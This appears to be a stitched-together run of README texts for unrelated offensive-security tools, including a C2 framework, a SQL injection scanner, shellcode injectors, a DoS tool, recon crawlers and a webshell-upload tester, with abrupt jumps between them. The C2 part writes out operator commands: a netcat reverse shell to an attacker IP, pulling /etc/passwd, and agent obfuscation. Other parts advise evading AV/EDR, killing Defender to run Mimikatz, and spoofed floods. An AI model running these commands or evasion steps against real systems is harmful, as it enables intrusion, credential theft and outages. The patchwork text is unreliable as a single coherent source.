The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.
Below you can find a normal flow diagram
In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.
More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.
Below is the flow diagram for this case.
To setup your environment start the admin.py first and then the c2_server.py and run the agent. After you can check the availiable agents.
# show all availiable agents
show agent all
To instruct all the agents to run the command "id" you can do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241
You can also change the interval of the agents that checks for tasks to 30 seconds like this:
# to set it for all agents
task add all c2-sleep 30
To open a session with one or more of your agents do the following.
# find the agent/uuid
show agent all
# enable the server to accept connections
sessions server start 5555
# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555
# display a list of available connections
sessions list
# select to attach to one of the sessions, lets select 0
sessions select 0
# run a command
id
# download the passwd file locally
download /etc/passwd
# list your files locally to check that passwd was created
local-ls
# upload a file (test.txt) in the directory where the agent is
upload test.txt
# return to the main cli
go back
# check if the server is running
sessions server status
# stop the sessions server
sessions server stop
If for some reason you want to run another external session like with netcat or metaspolit do the following.
# show all availiable agents
show agent all
# first open a netcat on your machine
nc -vnlp 4444
# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444
This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.
The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding
Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py
You can run it like this:
python3 obfuscator.py
# and to run the agent, do as usual
python3 obs_agent.py
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key
pip install pyinstaller
pyinstaller --onefile agent.py
The binary can be found under the dist directory.
In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened
Create new certs in each engagement
Backup your c2.db, it is easy... just a file
pytest was used for the testing. You can run the tests like this:
cd tests/
py.test
Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data
To check the code coverage and produce a nice html report you can use this:
# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html
Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.
HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers , penetration testers & bug bounty hunters to test the security of web applications.Β
This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.
The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.
Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.
By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.
Install HBSQLI with following steps:
$ git clone https://github.com/SAPT01/HBSQLI.git
$ cd HBSQLI
$ pip3 install -r requirements.txt
usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]
options:
-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
-H HEADERS, --headers HEADERS
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode
$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v
$ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v
There are basically two modes in this, verbose which will show you all the process which is happening and show your the status of each test done and non-verbose, which will just print the vulnerable ones on the screen. To initiate the verbose mode just add -v in your command
You can use the provided payload file or use a custom payload file, just remember that delay in each payload in the payload file should be set to 30 seconds.
You can use the provided headers file or even some more custom header in that file itself according to your need.
(Currently) Fully Undetected same-process native/.NET assembly shellcode injector based on RecycledGate by thefLink, which is also based on HellsGate + HalosGate + TartarusGate to ensure undetectable native syscalls even if one technique fails.
To remain stealthy and keep entropy on the final executable low, do ensure that shellcode is always loaded externally since most AV/EDRs won't check for signatures on non-executable or DLL files anyway.
Important to also note that the fully undetected part refers to the loading of the shellcode, however, the shellcode will still be subject to behavior monotoring, thus make sure the loaded executable also makes use of defense evasion techniques (e.g., SharpKatz which features DInvoke instead of Mimikatz).
.\RecycledInjector.exe <path_to_shellcode_file>
This proof of concept leverages Terminator by ZeroMemoryEx to kill most security solution/agents present on the system. It is used against Microsoft Defender for Endpoint EDR.
On the left we inject the Terminator shellcode to load the vulnerable driver and kill MDE processes, and on the right is an example of loading and executing Invoke-Mimikatz remotely from memory, which is not stopped as there is no running security solution anymore on the system.
Spoofy
is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"
Well, Spoofy is different and here is why:
- Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
- Accurate bulk lookups
- Custom, manually tested spoof logic (No guessing or speculating, real world test results)
- SPF lookup counter
Β
Spoofy
requires Python 3+. Python 2 is not supported. Usage is shown below:
Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]
Install Dependencies:
pip3 install -r requirements.txt
(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here
The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.
After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.
This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end userβs responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.
Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley
DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf
Logo: cobracode
Tool was inspired by Bishop Fox's project called spoofcheck.
ModuleShifting is stealthier variation of Module Stomping and Module overloading injection technique. It is actually implemented in Python ctypes so that it can be executed fully in memory via a Python interpreter and Pyramid, thus avoiding the usage of compiled loaders.
The technique can be used with PE or shellcode payloads, however, the stealthier variation is to be used with shellcode payloads that need to be functionally independent from the final payload that the shellcode is loading.
ModuleShifting, when used with shellcode payload, is performing the following operations:
When using a PE payload, ModuleShifting will perform the following operation:
ModuleShifting can be used to inject a payload without dynamically allocating memory (i.e. VirtualAlloc) and compared to Module Stomping and Module Overloading is stealthier because it decreases the amount of IoCs generated by the injection technique itself.
There are 3 main differences between Module Shifting and some public implementations of Module stomping (one from Bobby Cooke and WithSecure)
The differences between Module Shifting and Module Overloading are the following:
Using a functionally independent shellcode payload such as an AceLdr Beacon Stageless shellcode payload, ModuleShifting is able to locally inject without dynamically allocating memory and at the moment generating zero IoC on a Moneta and PE-Sieve scan. I am aware that the AceLdr sleeping payloads can be caught with other great tools such as Hunt-Sleeping-Beacon, but the focus here is on the injection technique itself, not on the payload. In our case what is enabling more stealthiness in the injection is the shellcode functional independence, so that the written malicious bytes can be restored to its original content, effectively erasing the traces of the injection.
All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.
This work has been made possible because of the knowledge and tools shared by incredible people like Aleksandra Doniec @hasherezade, Forest Orr and Kyle Avery. I heavily used Moneta, PeSieve, PE-Bear and AceLdr throughout all my learning process and they have been key for my understanding of this topic.
ModuleShifting can be used with Pyramid and a Python interpreter to execute the local process injection fully in-memory, avoiding compiled loaders.
git clone https://github.com/naksyn/Pyramid
python3 pyramid.py -u testuser -pass testpass -p 443 -enc chacha20 -passenc superpass -generate -server 192.168.1.2 -setcradle moduleshifting.py
To successfully execute this technique you should use a shellcode payload that is capable of loading an additional self-sustainable payload in another area of memory. ModuleShifting has been tested with AceLdr payload, which is capable of loading an entire copy of Beacon on the heap, so breaking the functional dependency with the initial shellcode. This technique would work with any shellcode payload that has similar capabilities. So the initial shellcode becomes useless once executed and there's no reason to keep it in memory as an IoC.
A hosting dll with enough space for the shellcode on the targeted section should also be chosen, otherwise the technique will fail.
Module Stomping and Module Shifting need to write shellcode on a legitimate dll memory space. ModuleShifting will eliminate this IoC after the cleanup phase but indicators could be spotted by scanners with realtime inspection capabilities.
ICMP Packet Sniffer is a Python program that allows you to capture and analyze ICMP (Internet Control Message Protocol) packets on a network interface. It provides detailed information about the captured packets, including source and destination IP addresses, MAC addresses, ICMP type, payload data, and more. The program can also store the captured packets in a SQLite database and save them in a pcap format.
git clone https://github.com/HalilDeniz/ICMPWatch.git
pip install -r requirements.txt
python ICMPWatch.py [-h] [-v] [-t TIMEOUT] [-f FILTER] [-o OUTPUT] [--type {0,8}] [--src-ip SRC_IP] [--dst-ip DST_IP] -i INTERFACE [-db] [-c CAPTURE]
-v
or --verbose
: Show verbose packet details.-t
or --timeout
: Sniffing timeout in seconds (default is 300 seconds).-f
or --filter
: BPF filter for packet sniffing (default is "icmp").-o
or --output
: Output file to save captured packets.--type
: ICMP packet type to filter (0: Echo Reply, 8: Echo Request).--src-ip
: Source IP address to filter.--dst-ip
: Destination IP address to filter.-i
or --interface
: Network interface to capture packets (required).-db
or --database
: Store captured packets in an SQLite database.-c
or --capture
: Capture file to save packets in pcap format.Press Ctrl+C
to stop the sniffing process.
python icmpwatch.py -i eth0
python dnssnif.py -i eth0 -o icmp_results.txt
python icmpwatch.py -i eth0 --src-ip 192.168.1.10 --dst-ip 192.168.1.20
python icmpwatch.py -i eth0 --type 8
python icmpwatch.py -i eth0 -c captured_packets.pcap
DoSinator is a versatile Denial of Service (DoS) testing tool developed in Python. It empowers security professionals and researchers to simulate various types of DoS attacks, allowing them to assess the resilience of networks, systems, and applications against potential cyber threats.Β
Clone the repository:
git clone https://github.com/HalilDeniz/DoSinator.git
Navigate to the project directory:
cd DoSinator
Install the required dependencies:
pip install -r requirements.txt
usage: dos_tool.py [-h] -t TARGET -p PORT [-np NUM_PACKETS] [-ps PACKET_SIZE]
[-ar ATTACK_RATE] [-d DURATION] [-am {syn,udp,icmp,http,dns}]
[-sp SPOOF_IP] [--data DATA]
optional arguments:
-h, --help Show this help message and exit.
-t TARGET, --target TARGET
Target IP address.
-p PORT, --port PORT Target port number.
-np NUM_PACKETS, --num_packets NUM_PACKETS
Number of packets to send (default: 500).
-ps PACKET_SIZE, --packet_size PACKET_SIZE
Packet size in bytes (default: 64).
-ar ATTACK_RATE, --attack_rate ATTACK_RATE
Attack rate in packets per second (default: 10).
-d DURATION, --duration DURATION
Duration of the attack in seconds.
-am {syn,udp,icmp,htt p,dns}, --attack-mode {syn,udp,icmp,http,dns}
Attack mode (default: syn).
-sp SPOOF_IP, --spoof-ip SPOOF_IP
Spoof IP address.
--data DATA Custom data string to send.
target_ip
: IP address of the target system.target_port
: Port number of the target service.num_packets
: Number of packets to send (default: 500).packet_size
: Size of each packet in bytes (default: 64).attack_rate
: Attack rate in packets/second (default: 10).duration
: Duration of the attack in seconds.attack_mode
: Attack mode: syn, udp, icmp, http (default: syn).spoof_ip
: Spoof IP address (default: None).data
: Custom data string to send.The usage of the Dosinator tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The author assumes no liability and is not responsible for any misuse or damage caused by this program.
By using Dosinator, you agree to use this tool for educational and ethical purposes only. The author is not responsible for any actions or consequences resulting from misuse of this tool.
Please ensure that you have the necessary permissions to conduct any form of testing on a target network. Use this tool at your own risk.
Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.
If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:
The highlights of the changelog since the 2023.2 release from May:
xsubfind3r
is a command-line interface (CLI) utility to find domain's known subdomains from curated passive online sources.
Fetches domains from curated passive sources to maximize results.
Supports stdin
and stdout
for easy integration into workflows.
Cross-Platform (Windows, Linux & macOS).
Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget
or curl
:
...with wget
:
wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
...or, with curl
:
curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
...then, extract the binary:
tar xf xsubfind3r-<version>-linux-amd64.tar.gz
TIP: The above steps, download and extract, can be combined into a single step with this onliner
curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv
NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r
executable.
...move the xsubfind3r
binary to somewhere in your PATH
. For example, on GNU/Linux and OS X systems:
sudo mv xsubfind3r /usr/local/bin/
NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r
to their PATH
.
Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.
go install ...
go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest
go build ...
the development VersionClone the repository
git clone https://github.com/hueristiq/xsubfind3r.git
Build the utility
cd xsubfind3r/cmd/xsubfind3r && \
go build .
Move the xsubfind3r
binary to somewhere in your PATH
. For example, on GNU/Linux and OS X systems:
sudo mv xsubfind3r /usr/local/bin/
NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r
to their PATH
.
NOTE: While the development version is a good way to take a peek at xsubfind3r
's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.
xsubfind3r
will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml
file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.
Example config.yaml
:
version: 0.3.0
sources:
- alienvault
- anubis
- bevigil
- chaos
- commoncrawl
- crtsh
- fullhunt
- github
- hackertarget
- intelx
- shodan
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
chaos:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
fullhunt:
- 0d9652ce-516c-4315-b589-9b241ee6dc24
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8
To display help message for xsubfind3r
use the -h
flag:
xsubfind3r -h
help message:
_ __ _ _ _____
__ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
\ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
> <\__ \ |_| | |_) | _| | | | | (_| |___) | |
/_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0
USAGE:
xsubfind3r [OPTIONS]
INPUT:
-d, --domain string[] target domains
-l, --list string target domains' list file path
SOURCES:
--sources bool list supported sources
-u, --sources-to-use string[] comma(,) separeted sources to use
-e, --sources-to-exclude string[] comma(,) separeted sources to exclude
OPTIMIZATION:
-t, --threads int number of threads (default: 50)
OUTPUT:
--no-color bool disable colored output
-o, --output string output subdomains' file path
-O, --output-directory string output subdomains' directory path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)
CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)
Issues and Pull Requests are welcome! Check out the contribution guidelines.
This utility is distributed under the MIT license.
This project was built by pentesters for pentesters. Redeye is a tool intended to help you manage your data during a pentest operation in the most efficient and organized way.
Daniel Arad - @dandan_arad && Elad Pticha - @elad_pt
The Server panel will display all added server and basic information about the server such as: owned user, open port and if has been pwned.
After entering the server, An edit panel will appear. We can add new users found on the server, Found vulnerabilities and add relevant attain and files.
Users panel contains all found users from all servers, The users are categorized by permission level and type. Those details can be chaned by hovering on the username.
Files panel will display all the files from the current pentest. A team member can upload and download those files.
Attack vector panel will display all found attack vectors with Severity/Plausibility/Risk graphs.
PreReport panel will contain all the screenshots from the current pentest.
Graph panel will contain all of the Users and Servers and the relationship between them.
APIs allow users to effortlessly retrieve data by making simple API requests.
curl redeye.local:8443/api/servers --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/users --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/exploits --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
Pull from GitHub container registry.
git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
docker-compose up -d
Start/Stop the container
sudo docker-compose start/stop
Save/Load Redeye
docker save ghcr.io/redeye-framework/redeye:latest neo4j:4.4.9 > Redeye.tar
docker load < Redeye.tar
GitHub container registry: https://github.com/redeye-framework/Redeye/pkgs/container/redeye
git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
sudo apt install python3.8-venv
python3 -m venv RedeyeVirtualEnv
source RedeyeVirtualEnv/bin/activate
pip3 install -r requirements.txt
python3 RedDB/db.py
python3 redeye.py --safe
Redeye will listen on: http://0.0.0.0:8443
Default Credentials:
Neo4j will listen on: http://0.0.0.0:7474
Default Credentials:
Sidebar
flowchart
download.js
dropzone
Pictures and Icons
Logs
If you own any Code/File in Redeye that is not under MIT License please contact us at: redeye.framework@gmail.com
xcrawl3r
is a command-line interface (CLI) utility to recursively crawl webpages i.e systematically browse webpages' URLs and follow links to discover linked webpages' URLs.
.js
, .json
, .xml
, .csv
, .txt
& .map
).robots.txt
.Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget
or curl
:
...with wget
:
wget https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz
...or, with curl
:
curl -OL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz
...then, extract the binary:
tar xf xcrawl3r-<version>-linux-amd64.tar.gz
TIP: The above steps, download and extract, can be combined into a single step with this onliner
curl -sL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz | tar -xzv
NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xcrawl3r
executable.
...move the xcrawl3r
binary to somewhere in your PATH
. For example, on GNU/Linux and OS X systems:
sudo mv xcrawl3r /usr/local/bin/
NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r
to their PATH
.
Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.
go install ...
go install -v github.com/hueristiq/xcrawl3r/cmd/xcrawl3r@latest
go build ...
the development VersionClone the repository
git clone https://github.com/hueristiq/xcrawl3r.git
Build the utility
cd xcrawl3r/cmd/xcrawl3r && \
go build .
Move the xcrawl3r
binary to somewhere in your PATH
. For example, on GNU/Linux and OS X systems:
sudo mv xcrawl3r /usr/local/bin/
NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r
to their PATH
.
NOTE: While the development version is a good way to take a peek at xcrawl3r
's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.
To display help message for xcrawl3r
use the -h
flag:
xcrawl3r -h
help message:
_ _____
__ _____ _ __ __ ___ _| |___ / _ __
\ \/ / __| '__/ _` \ \ /\ / / | |_ \| '__|
> < (__| | | (_| |\ V V /| |___) | |
/_/\_\___|_| \__,_| \_/\_/ |_|____/|_| v0.1.0
A CLI utility to recursively crawl webpages.
USAGE:
xcrawl3r [OPTIONS]
INPUT:
-d, --domain string domain to match URLs
--include-subdomains bool match subdomains' URLs
-s, --seeds string seed URLs file (use `-` to get from stdin)
-u, --url string URL to crawl
CONFIGURATION:
--depth int maximum depth to crawl (default 3)
TIP: set it to `0` for infinite recursion
--headless bool If true the browser will be displayed while crawling.
-H, --headers string[] custom header to include in requests
e.g. -H 'Referer: http://example.com/'
TIP: use multiple flag to set multiple headers
--proxy string[] Proxy URL (e.g: http://127.0.0.1:8080)
TIP: use multiple flag to set multiple proxies
--render bool utilize a headless chrome instance to render pages
--timeout int time to wait for request in seconds (default: 10)
--user-agent string User Agent to use (default: web)
TIP: use `web` for a random web user-agent,
`mobile` for a random mobile user-agent,
or you can set your specific user-agent.
RATE LIMIT:
-c, --concurrency int number of concurrent fetchers to use (default 10)
--delay int delay between each request in seconds
--max-random-delay int maximux extra randomized delay added to `--dalay` (default: 1s)
-p, --parallelism int number of concurrent URLs to process (default: 10)
OUTPUT:
--debug bool enable debug mode (default: false)
-m, --monochrome bool coloring: no colored output mode
-o, --output string output file to write found URLs
-v, --verbosity string debug, info, warning, error, fatal or silent (default: debug)
Issues and Pull Requests are welcome! Check out the contribution guidelines.
This utility is distributed under the MIT license.
Alternatives - Check out projects below, that may fit in your workflow:
xurlfind3r
is a command-line interface (CLI) utility to find domain's known URLs from curated passive online sources.
robots.txt
snapshots.Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget
or curl
:
...with wget
:
wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
...or, with curl
:
curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
...then, extract the binary:
tar xf xurlfind3r-<version>-linux-amd64.tar.gz
TIP: The above steps, download and extract, can be combined into a single step with this onliner
curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv
NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r
executable.
...move the xurlfind3r
binary to somewhere in your PATH
. For example, on GNU/Linux and OS X systems:
sudo mv xurlfind3r /usr/local/bin/
NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r
to their PATH
.
Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.
go install ...
go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest
go build ...
the development VersionClone the repository
git clone https://github.com/hueristiq/xurlfind3r.git
Build the utility
cd xurlfind3r/cmd/xurlfind3r && \
go build .
Move the xurlfind3r
binary to somewhere in your PATH
. For example, on GNU/Linux and OS X systems:
sudo mv xurlfind3r /usr/local/bin/
NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r
to their PATH
.
NOTE: While the development version is a good way to take a peek at xurlfind3r
's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.
xurlfind3r
will work right after installation. However, BeVigil, Github and Intelligence X require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml
file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.
Example config.yaml
:
version: 0.2.0
sources:
- bevigil
- commoncrawl
- github
- intelx
- otx
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8
To display help message for xurlfind3r
use the -h
flag:
xurlfind3r -h
help message:
_ __ _ _ _____
__ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
\ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
> <| |_| | | | | _| | | | | (_| |___) | |
/_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0
USAGE:
xurlfind3r [OPTIONS]
TARGET:
-d, --domain string (sub)domain to match URLs
SCOPE:
--include-subdomains bool match subdomain's URLs
SOURCES:
-s, --sources bool list sources
-u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
--skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
--skip-wayback-source bool with wayback , skip parsing source code snapshots
FILTER & MATCH:
-f, --filter string regex to filter URLs
-m, --match string regex to match URLs
OUTPUT:
--no-color bool no color mode
-o, --output string output URLs file path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)
CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)
xurlfind3r -d hackerone.com --include-subdomains
# filter images
xurlfind3r -d hackerone.com --include-subdomains -f '`^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$`'
# match js URLs
xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'
Issues and Pull Requests are welcome! Check out the contribution guidelines.
This utility is distributed under the MIT license.
Upload_Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
Please note that the use of Upload_Bypass and any actions taken with it are solely at your own risk. The tool is provided for educational and testing purposes only. The developer of Upload_Bypass is not responsible for any misuse, damage, or illegal activities caused by its usage.
While Upload_Bypass aims to assist Pentesters and Bug Hunters in testing file upload mechanisms, it is essential to obtain proper authorization and adhere to applicable laws and regulations before performing any security assessments. Always ensure that you have the necessary permissions from the relevant stakeholders before conducting any testing activities.
The results and findings obtained from using Upload_Bypass should be communicated responsibly and in accordance with established disclosure processes. It is crucial to respect the privacy and integrity of the tested systems and refrain from causing harm or disruption.
By using Upload_Bypass, you acknowledge that the developer cannot be held liable for any consequences resulting from its use. Use the tool responsibly and ethically to promote the security and integrity of web applications.
Download the latest version from Releases page.
pip install -r requirements.txt
The tool will not function properly if the file upload mechanism includes CAPTCHA implementation.
Perhaps in the future the tool will include an OCR.
The Tool is compatible exclusively with output file requests generated by Burp Suite.
Before saving the Burp file, replace the file content with the string *content* and filename.ext with the string *filename* and Content-Type header with *mimetype*(only if the tool is not able to recognize it automatically).
How a request should look before the changes:
How it should look after the changes:
If the tool fails to recognize the mime type automatically, you can add *mimetype* in the parameter's value of the Content-Type header.
Options: -h, --help
show this help message and exit
-b BURP_FILE, --burp-file BURP_FILE
Required - Read from a Burp Suite file
Usage: -b / --burp-file ~/Desktop/output
-s SUCCESS_MESSAGE, --success SUCCESS_MESSAGE
Required if -f is not set - Provide the success message when a file is uploaded
Usage: -s /--success 'File uploaded successfully.'
-f FAILURE_MESSAGE, --failure FAILURE_MESSAGE
Required if -s is not set - Provide a failure message when a file is uploaded
Usage: -f /--failure 'File is not allowed!'
-e FILE_EXTENSION, --extension FILE_EXTENSION
Required - Provide server backend extension
Usage: -e / --extension php (Supported extensions: php,asp,jsp,perl,coldfusion)
-a ALLOWED_EXTENSIONS, --allowed ALLOWED_EXTENSIONS
Required - Provide allowed extensions to be uploaded
Usage: -a /--allowed jpeg, png, zip, etc'
-l WEBSHELL_LOCATION, --location WEBSHELL_LOCATION
Provide a remote path where the WebShell will be uploaded (won't work if the file will be uploaded with a UUID).
Usage: -l / --location /uploads/
-rl NUMBER, --rate-limit NUMBER
Set rate-limiting with milliseconds between each request.
Usage: -r / --rate-limit 700
-p PROXY_NUM, --proxy PROXY_NUM
Channel the HTTP requests via proxy client (i.e Burp Suite).
Usage: -p / --proxy http://127.0.0.1:8080
-S, --ssl
If set, the tool will not validate TLS/SSL certificate.
Usage: -S / --ssl
-c, --continue
If set, the brute force will continue even if one of the methods gets a hit!
Usage: -C /--continue
-E, --eicar
If set, an Eicar file(Anti Malware Testfile) will be uploaded only. WebShells will not be uploaded (Suitable for real environments).
Usage: -E / --eicar
-v, --verbose
If set, details about the test will be printed on the screen
Usage: -v / --verbose
-r, --response
If set, HTTP response will be printed on the screen
Usage: -r / --response
--version
Print the current version of the tool.
--update
Checks for new updates. If there is a new update, it will be downloaded and updated automatically.
python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e php -a jpeg --response -v --eicar --continue
python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e asp -a zip -v
python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e jsp -a png -v --proxy http://127.0.0.1:8080
